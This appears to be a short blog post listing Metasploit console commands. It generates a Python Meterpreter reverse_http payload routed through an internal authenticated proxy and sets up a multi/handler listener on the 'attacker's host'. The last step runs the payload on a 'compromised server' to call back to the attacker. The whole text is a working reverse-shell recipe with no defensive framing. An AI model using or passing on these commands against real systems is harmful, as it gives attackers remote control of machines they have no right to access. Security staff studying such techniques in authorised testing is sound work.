Attacker's host
msf >use payload/python/meterpreter/reverse_http
msf payload(reverse_http) >set lhost LOCAL_PUBLIC_IP
msf payload(reverse_http) >set lport 80
msf payload(reverse_http) >set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IP
msf payload(reverse_http) >set payloadproxyport INTERNAL_PROXY_PORT
msf payload(reverse_http) >generate -b '\x00\xff' -t raw -f met.py
msf >use exploit/multi/handler
msf exploit(handler) >set payload python/meterpreter/reverse_http
msf exploit(handler) >set lhost LOCAL_PUBLIC_IP
msf exploit(handler) >set lport 80
msf exploit(handler) >set payloadproxyhost USERNAME:PASSWORD@INTERNAL_PROXY:IP
msf exploit(handler) >set PayloadProxyPort INTERNAL_PROXY_PORT
msf exploit(handler) >run
Compromised server
# python met.py
No comments:
Post a Comment